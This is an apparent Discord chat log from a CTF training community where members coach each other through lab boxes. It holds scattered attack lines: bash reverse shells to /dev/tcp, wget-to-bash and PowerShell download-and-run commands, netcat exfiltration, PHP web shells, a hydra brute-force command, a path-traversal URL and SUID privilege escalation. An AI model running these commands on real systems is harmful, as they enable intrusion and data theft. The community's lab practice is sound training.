#voice-chat

1 messages ยท Page 17 of 1

ashen prism
#

The session 4

#

Try to interact with it again , sessions -i 4

#

sessions to check again ?

#

Take a break that's all I can say now xD

#

msf is F'ed

candid carbon
#

uh

#

Should I start screaming now?

ashen prism
#

No no xDD

#

Just relax , take a breaak

manic canyon
#

Who needs help ๐Ÿ‘€

candid carbon
#

uh msf Is fucked

#

At least for me.

manic canyon
#

I'd love it if you were less vague

candid carbon
#

Sorry.

#

MSF Is closing my sessions all the time.

manic canyon
#

show me

ashen prism
#

He gets an active sessions but after some time it prompts a message that sessions died

candid carbon
#

^

ashen prism
#

He got like 4 times now and every time they died like after a minute or two

manic canyon
#

show me

ashen prism
#

set PAYLOAD windows/meterpreter/reverse_tcp

manic canyon
#

type options

#

@candid carbon type options

ashen prism
#

show options

manic canyon
#

Look at what isn't set

ashen prism
#

Yes RHOSTS

supple trellis
#

@mighty moon @austere viper ~/.wpscan/scan.yml

manic canyon
#

You typed "hosts" rather than "rhost" lmao

#

don't use -j

#

run

#

What are you trying to do

#

Try sessions

#

background

#

then sessions

#

meterpreter> is the prompt for you to enter commands

#

Type ls or dir

#

give it a moment to respond

#

cd .. x 5

#

Just type

#

cd .. 5 times

#

that won't work

#

dir

hollow steeple
#

oiii

manic canyon
#

cd ..

#

cd ..

ashen prism
#

cd .. takes you one directory back

hollow steeple
#

hold up do you guys now like hoe to hack proffesionaly

candid carbon
#

Hell nah

manic canyon
#

maybe

ashen prism
#

yeet

manic canyon
#

try

#

cd c:\users

hollow steeple
#

bruh alright so anyone of you can take my discord ill let you do it see if your good lmao

manic canyon
#

And remember when you read the rules, everything here is legal ๐Ÿ˜‰

#

@quiet needle

hollow steeple
#

like forreal

candid carbon
#

R.I.P

muted dirge
manic canyon
#

@candid carbon keep going until it responds

quiet needle
#

Yeah, we don't do that nor discuss that at all here @hollow steeple

manic canyon
#

ah shoot

#

STOP hahahah

#

type dir again

quiet needle
#

!rule 9

trim cloudBOT
#

Rule 9: No discussion of illegal topics or actions.

quiet needle
#

This extends hackers for hire @hollow steeple

manic canyon
#

this is so sad

hollow steeple
#

lmao im only 13 i dont have no money lmao

candid carbon
#

My brain went kabom

#

boom

ashen prism
#

booom

manic canyon
#

Tmrofter you need to keep changing directories until you can see the Users directory

candid carbon
#

earrape makes you think harder

marble cape
#

Banned milkyway for discussion of illegal topics and a homophobic status

manic canyon
#

:/

quiet needle
#

We can use more creative vocabulary then that @candid carbon

manic canyon
#

Thank you Dark

ashen prism
#

That's pretty sad : (

manic canyon
#

Wooooo

ashen prism
#

did cd .. worked ? xD

candid carbon
#

YE

manic canyon
#

Now try dir

candid carbon
#

dir

manic canyon
#

I mean it doesn't seem to die

#

And you can change directories so

ashen prism
#

I don't know when I was helping him to get a shell like 4 times that shell died : (

#

But it seems it's stable now

candid carbon
#

I'm still smiling

ashen prism
#

Yeah man keep smiling ๐Ÿ™‚

candid carbon
#

@ashen prism What now?

#

Just sudo msfdb run?

ashen prism
#

No your in a shell now you don't need to do taht

#

that *

candid carbon
#

oki

ashen prism
#

run ps to check list of processes running on that machine

#

Run it again

#

is help command working ?

supple trellis
#

@muted dirge open plugin editor, add system('bash -c "bash -i >& /dev/tcp/<ip>/9000 0>&1"'); in the code save, run that plugin if it is not running already

quiet needle
ashen prism
#

@candid carbon Ok now scroll up to see the basic commands you can run

#

Look for a command that can list all processes

#

Really it doesn't ?

#

Ok ps is a command then why is it taking it so long

#

Is dir still working ?

#

Me too xD

#

Now I want to scream xDDDD

mighty moon
#

/usr/share/webshells/php/php-reverse-shell.php

ashen prism
#

@candid carbon I'm gonna get going it's way much late for me sorry I can't help you with this : (

#

Yeah it seems

candid carbon
#

@ashen prism cya

summer pagoda
#

What machine are you woking on? did you hear me?

supple trellis
#

jack

plucky vault
#

you could cat file | base64 | nc ip port

west siren
#

what r u guys doing in vc?

raven verge
mighty moon
#

wget http://<url>/file -O | bash

muted dirge
#

wget <URL file> -O - | bash

west siren
#

what r u guys doing in vc?
????

muted dirge
#

we are having fun

#

working on a box together

summer pagoda
#

what box?

supple trellis
#

@summer pagoda for the 3rd time, it is jack

summer pagoda
#

damn

west siren
#

htb?

#

or thm?

supple trellis
west siren
plucky vault
#

ping -n 3 ip always

#

@candid carbon using session 1, I think it's migrate -n spool ?

#

session -i 1 first @candid carbon

#

sessions*

#

oof.

#

you're telling me, I'm on anonymous playground rn and I'm on the last step

#

stuck with a (chmod 600) id_rsa file and nowhere to use it

plucky vault
#

it's in /etc/debconf.conf

#

please don't just do that

#

there's a requirements.txt file

#

[pip_method] install -r requirements.txt

muted dirge
#

Is this for who?

plucky vault
#

jake, sorry

#

he was installing pwncat, a python script

austere viper
plucky vault
#

he's at the washroom rn

#

huh, wait there is a cron

#

will pwncat help with ^C'ing hung processes? ๐Ÿ‘€

#

guess he's still at the washroom

austere viper
tight swan
#

lol

boreal hawk
#

whihc box are u try'n? @dark igloo

dark igloo
#

hmm, alfred ^^

boreal hawk
#

noice box

#

its good

dark igloo
#

yep, but kinda hard

#

like, i'm stuck here

boreal hawk
#

where?

dark igloo
#

idk where i put the command ^^

boreal hawk
#

did u get terminal?

#

try linpeas

dark igloo
#

this ?

boreal hawk
#

set that linpeas in ur apcahe server

dark igloo
#

with curl ?

boreal hawk
#

no just paste that file in www folder

#

and start service

dark igloo
#

www folder ?

boreal hawk
#

wait go to kali

#

file system

#

var

#

html

#

\paster here

#

root permisions

dark igloo
#

how i get the root permissions ?

#

i can't sudo su

boreal hawk
#

sudo bash?

#

no

#

in ur terminal

#

no bruh ur pc termial

dark igloo
#

xd

#

hmm

boreal hawk
#

noice

#

cp

#

to that folder maybe?

#

start

#

jhyust service apache start

#

yes

#

2

#

apache2

#

then curl in that terminal

#

for the linpeas

#

curl the link

#

apache link

#

ur ip adress

#

ip_add/linepeas

#

wait

#

is it culr or wget?

#

we are sending linpeas to target file

lofty moat
#

wget <ip>:<port>/linpeas.sh
@dark igloo

boreal hawk
#

the

#

wait i gues linpeas in apche2

#

once open ip in ur browers

#

/linpeas

#

wait

#

wt file did u paster there?

lofty moat
#

wget <ip>:<port>/linPEAS/linpeas.sh

boreal hawk
#

yeah

#

yeah we did same

#

bro u did write u dint paste the corect shell file

#

u pasted the web server link

lofty moat
#
wget <your ip>:8000/linpeas.sh```
Make sure you are in the right directory @dark igloo
boreal hawk
#

yeah

#

\just do gitclone

#

html

#

vuln

#

wait did u get the terminal ?

#

of that server?

#

user shell did u get it?

#

can u paste the screenshot of that step here

dark igloo
plucky vault
#

he's right, it starts in the directory you start it in by default

boreal hawk
#

i guees

#

in ther server u have to find a area

plucky vault
#

oh wait you started an apache server

boreal hawk
#

wher u can type this code

plucky vault
#

then yeah, you're gonna wanna put it in /var/www/html/

boreal hawk
#

yes

#

yeah tryt that commnad

plucky vault
#

you have an http server running on 8000, you won't catch a shell if you upload that

boreal hawk
#

netcat to that port

#

listen on that [port maybe

#

another port

plucky vault
#

you have an apache server running on port 80 too lol

boreal hawk
#

in the coomnad also put the same port whihc ur using in netcat

plucky vault
#

you're close, think about what you've done

#

here, run this sudo service apache2 stop

boreal hawk
#

i think it just saved

#

its like maybe that command is just saved u should like run it like ruuning the codes in server

#

see where all the clients are saved

#

go in build now

#

back go back

#

to home

#

no at first it showd a option like build now

#

goto projects

#

that project

#

1min before edited one

#

dont know bruh i am also stuck here

plucky vault
#

you guys have code exec ๐Ÿ˜ญ

muted dirge
#

Glass is back with another room wee

dark igloo
#

^^

boreal hawk
#

noice

#

ig we pasted in wrong shell

muted dirge
#

what you working on Glass?

dark igloo
#

Alfred room ^^

muted dirge
#

uuu. Haven't done that one. Fun?

dark igloo
#

NO

old kite
#

Bye Juice blobfingerguns

dark igloo
#

bye ^^

plucky vault
#

it's (port 80) used by your apache2 service.. ๐Ÿ˜…

muted dirge
#

Hey @plucky vault I finished rooting Jack this morning. It was quite easy after finding out that .py process

plucky vault
#

it's a weird one tbh, it's pretty CTF-y that we're just allowed to edit python3 libs

#

yw though

muted dirge
#

Exactly. I am not really sure how I would have done it if there were no write permissions. Something with PATH maybe? Pointing out to another place to look for libraries idk

plucky vault
#

sorry, wasn't paying attention

#

what payload did you use?

#

multi/handler requires specification, otherwise it defaults to a nc shell

#

kk, making sure

#

it's not lol

#

you used meterpreter in msfvenom

#

windows/meterpreter/reverse_tcp

#

yea, you did in msfvenom in your bottom windows

#

bottom right

#

-p option sets payload

#

you used windows/meterpreter/reverse_tcp which is a meterpreter payload

#

your multi/handler is using generic/reverse_tcp

#

set payload windows/meterpreter/reverse_tcp

#

it's a shell upgrade

#

yeah

#

meterpreter makes it easy to migrate into privledged executables like spoolsv.exe

#

you'll get it eventually, windows sec is dramatically diff from linux sec

#

the impersonate token allows you to impersonate the privledges of processes with a lower "integrity" value

#

oh try running shell

#

yeah

#

NT Authority's weird, I think it's kernel?

#

yeah sorry, you should learn a bit about the authorization scheme Linux uses

#

userland and stuff, yea

#

just read it as root

#

type

#

gg, grats

#

kk, it's fine

#

cya

royal gust
#

oh man. i remmeber alfred

#

that was not fun at all

dark igloo
#

Xd

#

Yeah it was quite fun tbh

#

Juste ended it with a lot of help ^^

#

I will be here in ~1h to do another room ^^

old kite
#

Hi Juice

dark igloo
#

hi ^^

boreal hawk
#

hye glass did u complete that box?

dark igloo
#

which one ?

boreal hawk
#

alfred

dark igloo
#

sure ^^

boreal hawk
#

noice

dark igloo
#

i'm doing another one now ^^

boreal hawk
#

whihc one?

dark igloo
#

hackpark ^^

boreal hawk
#

man its vip rooms

#

i dont have it

dark igloo
#

then subscribe ^^

boreal hawk
#

no money

dark igloo
#

xd

boreal hawk
#

lmfao

dark igloo
#

?

boreal hawk
#

bro wt other website u use?

#

whihc are very informational

#

is vulnhub any good?

#

can we have a koth?

#

not now

#

some time later

#

ohk?

#

mee too

#

ohk we will try

#

just to get user

#

i will ping u when i am free

#

i also feel same somtime

#

dumb

#

k bye we can exams goddam

#

i dont know

#

why we have managemnet exam in cse

#

lol

#

cya

bright thistle
#

scroll down, you have an example

#

hydra knows what to do

#

leave it like that

#

no is not

#

use burp to intercept the login request

#

burp, my bad

#

foxyproxy

#

no

#

set the proxy: 127.0.0.1 port 8080

#

in foxy proxy

#

user options

#

don't bruteforce the password with burp

#

just intercept the request

#

is that the only page to login?

#

this is the correct page to brute force

dark igloo
#

are u sure this command is right ?

plucky vault
#

you don't need the ip

#

local file upload

#

oh yeah the scp command thing?

#

scp file otheruser@target:/otherfiles

#

oh yeah it's forensically safe

#

I think he mentioned pwncat having modules for autopwn

#

python *.py

#

could be python3

#

data:text/html,<marquee>this is my cool site</marquee>

old kite
#

What are you brute forcing @mental knoll

plucky vault
#

huh. @mental knoll have you added the cookie that's sent?

#

there's a cookie connect.sid

#

idk, just making a guess

proper geyser
#

@dark igloo ur using windowsExploitSuggester the wrong way

#

@dark igloo
on kali machine
./windows-exploit-suggester.py --update
on the target machine
systeminfo (save it to a file) then move that file to kali machine
and feed it to windows-exploit-suggester.py

#

try systeminfo instead

#

COPY PASTE ๐Ÿ™‚

plucky vault
#

@dark igloo try download

dark igloo
#

@plucky vault any idea ?

plucky vault
#

oh sorry wasn't paying attention, what's happening?

#

loki seems like he knows what he's doing

#

priv esc

#

btw did your windows priv esc file come with a requirements.txt?

#

@mental knoll sorry I couldn't help it, it's a data uri for a discord ping

dark igloo
#

why is it so long ?

plucky vault
#

glass what did you run?

#

it looks like you're installing the entirety of the official python repo?

dark igloo
#

apt-get upgrade ^^

#

xd

plucky vault
#

oh

dark igloo
#

nah

plucky vault
#

@dark igloo it's just the color

#

I'll start on revenge* (box) ig

dark igloo
#

ig ?

#

oh ok

#

gl

plucky vault
#

ig means I guess

#

kk, cya

maiden patio
#

cya

plucky vault
#

they don't even give you a voucher...

#

200 eJPT and 400 for the rest

#

try editing php.404, I think uname's automatically called

#

<?php system() ?>

#

yeah it's right

#

?cmd=

#

maybe you could powershell -c "wget domain/meterpreter_payload" ?

supple trellis
#

powershell IEX(IWR <url> -usebasicparsing)

ashen prism
#

cd C:\Windows\Temp

slow pond
vapid cipher
#

@slow pond thank you bro i'll try learned

compact scaffold
#

$PSVersionTable

muted dirge
#

What you working on?

cursive herald
rough flax
#

oh oh I wanna come I wanna come

cursive herald
#

Hack the box???

#

jkjk

#

its fine

#

๐Ÿ˜†

ruby kelp
#

hahahahaha

#

โค๏ธ

#

how to verify?

cursive herald
#

!docs verify

trim cloudBOT
cursive herald
#

@dark igloo is your name a reference to an edgy 4chan meme?

#

๐Ÿ‘€

tulip pollen
#

LOOOOL

fossil estuary
dark igloo
#

@ruby kelp
por favor haz lo del caballo malo

lofty moat
cedar phoenix
#

can you hack ig?

lofty moat
#

can you hack ig?
@cedar phoenix i pro hacker. i hack everything.

cedar phoenix
#

๐Ÿ‘€

lofty moat
#

I'm what people call HackerMan

cedar phoenix
#

100% they stopped due to error

lofty moat
#

hello @slender kayak

cedar phoenix
#

whoever asked about Kali kernel: docker containers share the host kernel, so it's his own kernel you see

ruby kelp
#

that is why the fork bombed crashed my entire system

lofty moat
#

@slender kayak you are from italy?

ruby kelp
#

@cedar phoenix

#

๐Ÿ˜„

lofty moat
#

i'm planning to move to italy next year

#

๐Ÿ‘€

slender kayak
#

@lofty moat which city?

thin schooner
#

?

#

or just restart ur router ๐Ÿ˜„

#

to get a new ip

#

lmao

slow stratus
#

๐Ÿ‘

cursive herald
#

๐Ÿ‘€

#

BED WARS

#

WITHOUT ME
๐Ÿ˜ 

#

are you on hypixel rn

#

lets play bedwars i've never played before

#

whats your username

#

i can add u

#

`/f add

#

mines ownowl

#

genshin impact

#

its anime so

#

let me join vc

lofty moat
#

@lofty moat which city?
@slender kayak not sure yet. Planning to do my Masters in cyber security from there

#

If you have any info let me know please

#

And suggestions for the city/uni

main rover
#

@lofty moat I would suggest you to check which Uni provide the best Master for CyberSecurity

#

I think you'll probably end up in Rome or Milan, as they have the biggest unis and wider options

#

Bologna is the oldest in the world, but I'm not sure how the master is / if they have one.. When I went there one of the professors was a guy who knew personally Linus Torvalds, he was a sort of mythical being, we called him Kernel Bear Davoli at one point (probably we were drunk) and that's how we remember him in my uni group ๐Ÿ˜„

lofty moat
#

I think you'll probably end up in Rome or Milan, as they have the biggest unis and wider options
@main rover i did check some. But still a person who lives there could provide better options. For now completing my bachelors. Will be free during july. So looking for a uni that still have admissions open around that time. Or if some accepts for my seventh semester transcript maybe

main rover
#

Fair enough, Uni courses in Italy normally starts in September (late) as June to August is summer holidays and you can enrol during that time

#

I've been living in Bologna for 30 years of my life and went to uni there (dropped off after 4 years because I started working)

slender kayak
#

@lofty moat Milan is better. I have a lot of friends from Rome which are planning to move there for work

lofty moat
#

Fair enough, Uni courses in Italy normally starts in September (late) as June to August is summer holidays and you can enrol during that time
@main rover that is when classes start. But i have heard admissions start around april?

#

@lofty moat Milan is better. I have a lot of friends from Rome which are planning to move there for work
@slender kayak any uni there you would suggest for?

main rover
#

@main rover that is when classes start. But i have heard admissions start around april?
@lofty moat I never heard of it, also because until June / July high school students are still doing exams and they're not sure where to go.. I think I applied in August

lofty moat
#

๐Ÿค”

#

Will check again and confirm that. If that's true then it would be awesome for me.

maiden patio
#

Ok Guys GTG byeee

#

ATB!1

boreal hawk
#

hye ther!!!!!

dark igloo
#

hii

old kite
#

Bye

#

Try MrRobot room

dark igloo
#

me ?

old kite
#

Next time

dark igloo
#

already done, steel mountain rught ?

old kite
#

bye

dark igloo
#

^^

midnight fern
#

0day writeups are public now, if you were having trouble.

mighty moon
#

<?php system($_GET['cmd']);?>

#

&cmd=ls

azure moss
#

Try other PHP ways to read files

mighty moon
#

<?php system($_GET['cmd']); ?>

#

&cmd=<your command>

old kite
#

which room

#

juice

tight swan
#

@dark igloo your screen looks so overwhelming wtf

west siren
#

wwhats going on in vc?

jolly bane
#

#!/bin/bash

bash -i >& /dev/tcp/10.9.170.133/8089 0>&1

#

@muted dirge

remote ledge
#

๐Ÿ˜†

real orbit
#

passthru > system

muted dirge
#

Watcha working on kali?

slender kayak
#

@mental knoll watching your stream on the bus

mental knoll
#

nice thanks dude

bright thistle
#

/bin/bash -c '/bin/bash -i >& /dev/tcp/IP/PORT 0>&1'

#

stty raw -echo; fg

young gate
#

Command: /bin/bash -c '/bin/bash -i >& /dev/tcp/$YOUR IP/$YOUR PORT 0>&1'
Note: To get a stable shell use the next commmands:
python3 -c 'import pty; pty.spawn("/bin/bash")'
press CTRL+Z then type stty raw -echo and finally type fg
export TERM=xterm

bright thistle
#

echo $PATH

#

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

supple trellis
#

@mental knoll cmd /c "juicy -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}"

dark igloo
#

are u subscribe ?

astral pike
#

.

plucky vault
#

exit()

remote ledge
#

close proxy

#

tmux a

#

tmux ls

plucky vault
#

revershell I think?

#

try dmv, itsmeadmin doesn't exist on the machine

remote ledge
#

next time do ./linpeas | tee linpea.txt

#

it will also show output of linpeas and store it in text file

plucky vault
#

someone already sent you a shell btw

#

wasn't me, just noticed it

#

export color_prompt=yes I think?

remote ledge
#

standard suid

plucky vault
#

^

#

it does CTRL+F lol

tawdry cypress
#

which room is this?

plucky vault
#

it's the youtube downloader one

tawdry cypress
#

u cannot really do sudo -l from www-data

#

cause it has no password probably.

#

and the sudo -l should return, (All, !root) <some command>

supple trellis
#

which room is this?
@tawdry cypress convert my vid

plucky vault
#

iirc the vuln against sudo 1.8.21p2 doesn't allow for priv esc. to root?

tawdry cypress
#

yeah it does

#

if we have a sudoers entry like that described in the website

#

like (All, !root) <some command>

#

that is the prerequisite

#

it's vulnerable if u meet the prerequisite.

#

from www-data i really believe u can't meet the requirement.

full sapphire
#

It's still worth trying sudo -l on www-data -- especially if the box is more CTF-y

#

You'd never see it in the real world, but some of the... less realistic boxes do it quite frequently

supple trellis
tawdry cypress
#

no no p2 has that as well

#

is it not p2?

#

thanks @supple trellis ! didn't know. thought anything less than 1.8.24 has that

#

it says if u have a param called c

#

then it will run that command

#

like url/?c=id

#

will run id command

tight swan
#

@mental knoll what the heck u doing now

tawdry cypress
#

wait why i am i writing here. they are not even checking vc chat

#

lol

plucky vault
#

tbf you guys never really touched on the dmv user

tawdry cypress
#

^ yes. if there is a user there will probably be a horizontal privesc somewhere

plucky vault
#

find / -user dmv 2>/dev/null or something, but there's no suids

remote ledge
#

you can make bash suid binary

#

and get root

plucky vault
#

depends, is path vuln?

remote ledge
#

there is cron running

#

so running chmod +s /bin/bash in cron should do the work

#

no need to listen for reverse shell

plucky vault
#

oh yeah, no you're right that'd work

remote ledge
#

hahah

#

@plucky vault who put chmod +s /bin/bash

#

๐Ÿคฃ

tight swan
plucky vault
#

Why is Microsoft this brain dead to allow NBNS spoofing?

#

Oi, take that off my comment now!

tight swan
#

I understand nothing you're reading,yikes.

plucky vault
#

Mate...

#

Oh thanks.

tight swan
#

wut

#

focus!!

plucky vault
#

lol

#

Yeah, I need to focus. XD

tight swan
#

Time for that relaxing playlist again kekw

#

LMAOAOAO

#

oh no no no

#

LMAOOAOA

plucky vault
#

So relaxing.

tight swan
#

thats what im saying...

#

@worthy ermine everything good?

plucky vault
#

Arose out from the azure main!

old kite
#

Is this Same Relevant 1 from Vulnhub ?

#

...

#

..

#

.

plucky vault
#

Not sure.

#

I don't do Vulnhub.

old kite
#

hmm

tight swan
#

There's a tutorial room

#

This is also a decent blog.

#

Decompiles binaries...wut??

plucky vault
#

What do you mean?

tight swan
#

Nuc mentioned it

#

idk

trim lava
#

changes binary to a language

fervent maple
#

@tight swan instead of compiling source code into machine code
ghidra takes binaries in machine code and attempt to decompile them into source code so you can figure out how the binary works and do reverse engi CTF challenges that don't require a dynamic binary analysis tool like gdb

tight swan
#

Ahh

plucky vault
#

Ahhhhhhh.

tight swan
#

brrrrrrrr

#

i go zzzzzzz now

plucky vault
#

Ok. See you later.

#

Probs tomorrow.

muted dirge
#

@tawdry cypress on dogcat you need to run sudo -l on www-data to move forward. I was confused myself of it but it seems it can happen

tawdry cypress
#

yeah as muir said, ctfy boxes have that.

compact sand
#

hello

#

how i can hack a mac book air??

gritty rivet
bright thistle
plucky vault
#

probably but with the salt you're likely to only hit writeups

dark igloo
#

'$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'

plucky vault
#

at a rate of 50 hash per second it'll take you 15 mins to crack it

full sapphire
#

how i can hack a mac book air??
@compact sand Would it be a MacBook Air that you own? ๐Ÿค”

paper steppe
#

.

plucky vault
#

you only need sudo privs for ports under 1024

#

@dark igloo ;

compact sand
#

yes

#

@full sapphire yes the macboob is mine

#

book

old kite
#

Bye ๐Ÿ‘‹

#

๐Ÿ‘‹

dark igloo
#

bye ^^

bright thistle
dark igloo
#

g

tight swan
#

g

candid carbon
#

g

hot snow
#

@minor sky wdym?

jade fossil
supple trellis
#

@mental knoll c:\windows\temp or %temp%

#

cd c:\windows\temp; dir @mental knoll

#

that is not a persistent shell

#

try dir c:\windows\temp then

#

cd $env:temp

upbeat inlet
#

@plucky vault youre correct mate! ๐Ÿ‘

tight swan
#

@plucky vault ๐Ÿ˜

plucky vault
#

Oi, MP3!

#

Why are you not in the chat!!!!

#

?

tight swan
#

Loading up pc, joining rn

#

what u working on?

#

what room

plucky vault
#

Wo de mingzi.

tight swan
plucky vault
#

delete that shit

tight swan
#

NO!

plucky vault
#

NO!

warm atlas
#

memories of my childhood vent

tight swan
#

not again LOOL

plucky vault
#

NIHAO!!!

tight swan
#

smol monkey

#

....

#

..

#

.

plucky vault
#

NIHAO!!!!!!!!!!!!!!!!!!

tight swan
#

you always get distracted by the dumbest things LMAO

autumn quest
#

delete that shit
@plucky vault language please and thanks.

plucky vault
#

lol my bad

tight swan
#

@compact sand we cant hear u

#

ahhh

compact sand
#

sorry just got a video running.and didnt see that i,m still in the chanel

tight swan
#

๐Ÿ˜ฆ

tight swan
#

;0

plucky vault
#

The service crashed that's why. -.-

#

(web)

slow pond
#

wait 3-5 min .

steady umbra
#

Gobuster sometimes won't work properly

old kite
#

Which room FancyBear

#

??

plucky vault
#

Kerberos.

last quail
#

it's protocal

#

maybe you use it in AD

last quail
#

maybe you use it in AD
@last quail '

plucky vault
#

You're not wrong.

#

๐Ÿ˜‰

last quail
#

Active directory

#

:))

plucky vault
#

Disactive InDirectory.

torpid elk
#

ok can you begin?

#

wow

last quail
#

-_-

torpid elk
#

report?

last quail
#

report?
@torpid elk ๐Ÿ‘

jade fossil
dark igloo
#

hey ^^

#

what append ?

last quail
#

i am record you stream:)
@torpid elk good job bro

dark igloo
#

i just understood "scam"

#

ye season 1 is good ^^

#

what are we waiting for ?

plucky vault
jade fossil
#

In this tutorial we continue what we learned from last time and introduce new concepts like c++. by the way did you know roller coaster tycoon was made by one person in assembly? amazing!

โ–ถ Play video

In this video (Part 1 of 932) we show you how to create an integer in C++.

โ–ถ Play video
compact scaffold
bright thistle
#

hydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P rockyou.txt

plucky vault
#

For a 0x2 hacker, Iโ€™m so confused.

dark igloo
#

^^

tight swan
#

LOL

plucky vault
#

What's "LOL"?

tight swan
#

.....

plucky vault
#

Behave yourself.

tight swan
#

mispelled that with what

#

now that we know....

sand agate
#

now we know

tight swan
#

no

sand agate
#

no, now we know that it was now that we know

tight swan
#

its
now that we know what active directory is we can blah blah blah

remote ledge
#

sudo apt install cowsay

tight swan
#

lol

remote ledge
#

๐Ÿคฃ

tight swan
#

LOL

remote ledge
#

nice vc

#

i like it

tight swan
#

so productive

remote ledge
#

yeah

#

learning a lot

#

๐Ÿคฃ

tight swan
remote ledge
#

ah man

tight swan
#

lol

remote ledge
#

that is a twist

tight swan
#

it does

remote ledge
#

๐Ÿคฃ๐Ÿคฃ

tight swan
remote ledge
plucky vault
#

NIHAO!!!!

#

NI HAO KAI LAN WAS MY SHIT

#

I love it!

tight swan
#

he listens to the anthum everyday!

remote ledge
#

๐Ÿ•ต๏ธ

tight swan
#

lol

remote ledge
#

๐Ÿ˜

#

where did the other guy went?

crude void
plucky vault
#

mksquashfs /some/dir dir.sqsh

#

@crude void

tight swan
#

bear angrycooctus

plucky vault
#

@plucky vault which os r u using as primary os

#

Ubuntu 20.04.

#

ohki

plucky vault
#

@lofty moat, how are you?

lofty moat
#

I'm fine, what about you?

plucky vault
#

Yeah, I feel great.

lofty moat
#

(Don't mind me i just like to watch, i don't talk)

plucky vault
#

We all know that.

#

This is so cool and interesting.

lofty moat
#

what is?? ๐Ÿค”

plucky vault
#

This AWS stuff.

#

Stuff I'm working on now.

lofty moat
#

Good luck

#

imma play a quick koth match before i go to bed

#

its 07:50am

plucky vault
#

Did you sleep through the night?

lofty moat
#

No

#

about to

plucky vault
#

Lol, wow.

round nova
#

@plucky vault what box is this ?

plucky vault
#

advent of cyber, task 19.

#

I'll be back.

#

I just don't want to leak my stuff.

round nova
#

what did you do so far ? I'm still new to this so i'd like to learn a bit more

#

ok cool thanks

plucky vault
#

I'm trying to list files in a S3 Amazon bucket.

#

Basically its cloud storage for ifles.

#

files

#

.

round nova
#

you're reading the syntax for aws ?

#

or did you have prior knowledge of aws

plucky vault
#

No, I don't.

#

Oh, a little bit actually.

#

At work.

#

We have a Filemaker server at work.

#

FileMaker is a cross-platform relational database application from Claris International, a subsidiary of Apple Inc. It integrates a database engine with a graphical user interface (GUI) and security features, allowing users to modify the database by dragging new elements into ...

#

And it runs on Amazon AWS.

round nova
#

oh wow cool, ok so i still have much to learn pepehands

plucky vault
#

Me too.

#

-.-

#

I don't know how I'm suppose to download the file.

#

It says that I need to sign up or something.

#

Surely I don't need to pay Amazon in order to complete this task.

round nova
#

no no

#

did you try to scan the address to see if you can somehow just straight up download it ?

plucky vault
#

No, I need to use aws-cli

round nova
#

hmm

plucky vault
#

According to the Google Sheet material.

round nova
#

what's the name of the file ?

plucky vault
#

I'm not paying anything to complete htis room.

#

I don't know yet.

#

I need to get my aws-cli working before I can find out.

round nova
#

i think this is key

#

Analysing requests on web pages
Some pages retrieve static resources from s3 buckets

rough flax
#

What room is it?

#

I canโ€™t think of any room that requires knowledge of s3 buckets and aws-cli

#

Oh aoc

#

you can just curl the bucket I mean you can set up aws-cli and interact with it but thatโ€™s a lot more annoying

plucky vault
#

How do I curl the bucket?

#

How do I see what is inside the file?

#

I got the filename but not the contents.

simple roost
#

how much knowledge required to play koth ?

plucky vault
#

@simple roost, not much.

#

For the easy machines at least.

simple roost
#

like ?

plucky vault
#

production.

#

@rough flax, thanks that curling hint helped. I just curled the file.

heady dew
#

Hi

#

it's worth going ahead if it's gonna pay out @plucky vault

#

lol true, keep it discreet, but clear

#

@plucky vault it's someone close-to-me who painted it

#

Hey @earnest prism

earnest prism
#

hey broh

#

is your mic not working ?

heady dew
#

can't use right now!

earnest prism
#

ok ok

heady dew
#

coz it's stable, even I use it! @plucky vault

#

it doesn't break on silly kernel updates

#

you wanna see how it looks for me? @plucky vault

#

Have a good one! bbye @plucky vault

#

@delicate crane you gotta restart the machine if you fail once

#

I guess the exploit has the word, "pulsor" in it, right? @plucky vault

#

This is in msf dude

#

it's surely gonna work!

#

lol

#

I didn't say to clone it, I sent it in reference to this

I guess the exploit has the word, "pulsor" in it, right? @plucky vault
@heady dew

dark igloo
#

omg internal was so hard i just dreamt about it

steady umbra
#

Hello there Advent of Cyber is for subscribers only or it's free

quiet needle
#

It is for free (;

wooden onyx
#

Woups missclick sorry :)

muted palm
#

Hey guys, first time here..hopefully i learn something ๐Ÿ™‚

royal gust
#

3 operations
aaa
afl (or af)
vv

#

navigate w/ arrow keys tab

#

radare2 is a gift from the gods

#

my BT just puked out

#

sorry

#

btw q to get out

#

i think

#

You have multiple levels of analysis

#

aa, aaa, aaaa

#

each one is more intensive

#

Yes

#

learning radare2 from learning paths

#

Uhh. hacktivities. sec

#

I know, it says intro to

#

its really an intro to r2 ๐Ÿ™‚

#

The debug book?

#

its good if you KNOW what you are looking for

#

if you dont know, its a long read

#

Yupyup. i just wante dot get you before my BT totally crapped out. its charging now

#

ciao

#

Good afternoon
[10:32 AM]
0x9 lvl I'm not sure if your trolling
[10:32 AM]
oh its krypto
[10:32 AM]
make sure you are doing the download ON your attack machine
[10:33 AM]
headphone charging right now. gimme bout 3 more mins

Message #koth-voice-chat

#

Bot is called tryhackme

royal gust
#

~/.bashrc

#

cat >> ~/.bashrc
alias ovpn='sudo openvpn ~/Downloads/kryptonn.ovpn'

#

CTL D (it means ^D)

supple trellis
#
cat >> ~/.bashrc  << 'EOF'
alias ovpn='sudo openvpn ~/Downloads/kryptonn.ovpn'
EOF```
royal gust
#

cat >> ~/.bashrc << EOF

#

source ~/.bashrc

lofty moat
#

sudo openvpn Documents/Naughty.ovpn
i don't like saving my 3 seconds.. i will put the whole command to run my vpn.

paper steppe
#

@royal gust i heared 6 oclock

supple trellis
supple trellis
#

@royal gust with sudo

#

-be for big endian

#

-le for little endian

royal gust
remote ledge
#

wow

#

sad story

crude void
#

-be for big endian
@supple trellis tthankss

royal gust
#

@remote ledge what's a sad story

remote ledge
royal gust
#

What is the ei??f

#

eiff?

remote ledge
#

TIFF

#

zsteg

#

stegsolve.jar

supple trellis
royal gust
bright thistle
remote ledge
#

CVE-2018โ€“17246

#

http://<remote-ip>:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../root.txt

#

Reference Error

royal gust
#

10.10.65.82

manic canyon
#

๐Ÿ‘€

supple trellis
#

๐Ÿ™„

remote ledge
#

